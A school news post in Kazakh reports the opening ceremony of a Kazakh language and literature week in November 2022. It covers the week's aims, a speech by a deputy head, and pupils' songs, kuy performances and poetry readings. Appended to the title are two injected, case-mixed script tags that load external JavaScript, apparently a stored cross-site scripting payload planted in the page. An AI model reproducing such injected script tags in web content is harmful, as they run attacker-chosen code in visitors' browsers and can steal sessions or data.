Қазақ тілі мен әдебиеті апталығының ашылу салтанаты<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

28.11.2022

Қараша айының 21 күні Қазақ тілі мен әдебиеті апталығының ашылу салтанаты өтті. Мақсаты:қазақ тілі мен әдебиетінің мол мұрасымен кеңінен таныстыру, пәннің адам өміріндегі маңыздылығын түсіндіру, тілдің мемлекеттік мәртебесін қалыптастыру. Қазақ тілінің қолданылу аясын кеңейтуге үлес қосу. Қазақ халқының әдебиетін негізге ала отырып, көркем әдеби шығармалардағы кейіпкерлердің игі істерін насихаттау арқылы елжандылыққа, адамгершілікке, бауырмалдыққа тәрбиелеу. Тілін, елін сүйе білуге үйрету. Апталыққа қазақ тілі пән мұғалімдері, ОІМ Куликов Д.Т. қатысып,апталықтың жоспарымен таныстырып, шымылдығын сөз сөйлеп ашып берді. Оқушылар ән қазақ тілінде ән айтып, күй тартып, ақын-жазушыларымыздың жыр- шумақтарын оқыды. Алда әлі жоспарға сай іс- шаралар өтуде. Қазақ тілі мен әдебиеті ӘБ сәттілік тілейміз!

Просмотров: 630

Қосымшалар:



Пікір қосу



Деректерді қолтаңбаға қосу